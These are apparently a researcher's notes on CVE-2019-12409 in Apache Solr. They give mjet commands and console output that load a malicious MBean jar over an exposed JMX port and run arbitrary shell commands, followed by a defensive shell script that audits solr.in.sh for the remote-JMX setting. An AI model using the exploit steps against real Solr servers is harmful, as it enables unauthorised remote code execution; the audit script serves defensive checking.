Reference:
https://github.com/jas502n/CVE-2019-12409
Only versions 8.1.1 and 8.2.0 are affected.
Download:
git clone https://github.com/mogwailabs/mjet
Exploitation:
[master][~/GitProjects/mjet]$ java -jar ~/downloads/jython-standalone-2.7.1.jar mjet.py 127.0.0.1 18983 install super_secret http://127.0.0.1:8000 8000
MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://127.0.0.1:18983/jmxrmi
[+] Connected: rmi://127.0.0.1 3
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://127.0.0.1:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
127.0.0.1 - - [24/Feb/2020 11:14:02] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2020 11:14:02] "GET /vxcrtedo.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Successfully changed password
[+] Done
[master][~/GitProjects/mjet]$ java -jar ~/downloads/jython-standalone-2.7.1.jar mjet.py 127.0.0.1 18983 command super_secret "id&&pwd&&ls"
MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://127.0.0.1:18983/jmxrmi
[+] Connected: rmi://127.0.0.1 4
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: id&&pwd&&ls
uid=501(caiqiqi) gid=20(staff) groups=20(staff),501(access_bpf),701(com.apple.sharepoint.group.1),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),101(com.apple.access_ssh-disabled),703(com.apple.sharepoint.group.2),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),400(com.apple.access_remote_ae)
/Volumes/256G/Applications/solr/solr-8.2.0/server
README.txt
contexts
etc
lib
logs
modules
resources
scripts
solr
solr-webapp
start.jar
[+] Done
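
The session above reaches JMX on port 18983 without credentials; in the affected releases that listener is turned on by the ENABLE_REMOTE_JMX_OPTS setting in the default solr.in.sh. The script below is an added example, not part of the original notes or of mjet: it audits a solr.in.sh for that setting. The function names and the sample file are constructed for illustration, and it assumes only the literal value "true" enables the listener.

```shell
# Added example: audit a solr.in.sh for the remote-JMX setting behind CVE-2019-12409.

# Print the effective (last uncommented) value assigned to VAR in FILE, quotes stripped.
effective_value() {
  local var="$1" file="$2"
  sed -n -E "s/^[[:space:]]*(export[[:space:]]+)?${var}=[\"']?([^\"'#[:space:]]*)[\"']?.*/\2/p" "$file" | tail -n 1
}

# Return 1 and print a finding when remote JMX is enabled, return 0 otherwise.
audit_solr_jmx() {
  local file="$1" enabled port
  enabled="$(effective_value ENABLE_REMOTE_JMX_OPTS "$file")"
  port="$(effective_value RMI_PORT "$file")"
  if [ "$enabled" = "true" ]; then
    # 18983 is the port seen in the session above; it is reported when RMI_PORT is not set.
    echo "FINDING: $file enables remote JMX on RMI port ${port:-18983}"
    return 1
  fi
  echo "OK: $file does not enable remote JMX"
  return 0
}

# Write a constructed sample solr.in.sh (not taken from a real deployment).
# $1 = value for ENABLE_REMOTE_JMX_OPTS, $2 = output path
write_sample() {
  printf '%s\n' '#SOLR_HEAP="512m"' "ENABLE_REMOTE_JMX_OPTS=\"$1\"" '#RMI_PORT=18983' > "$2"
}

# Demo on the constructed sample: the insecure value as shipped in 8.1.1 and 8.2.0.
sample="$(mktemp)"
write_sample true "$sample"
audit_solr_jmx "$sample" || echo "-> set ENABLE_REMOTE_JMX_OPTS=\"false\" on every node and restart Solr"
rm -f "$sample"
```

Run it against the effective solr.in.sh of each node (for example with `audit_solr_jmx /etc/default/solr.in.sh`, a path that depends on how Solr was installed).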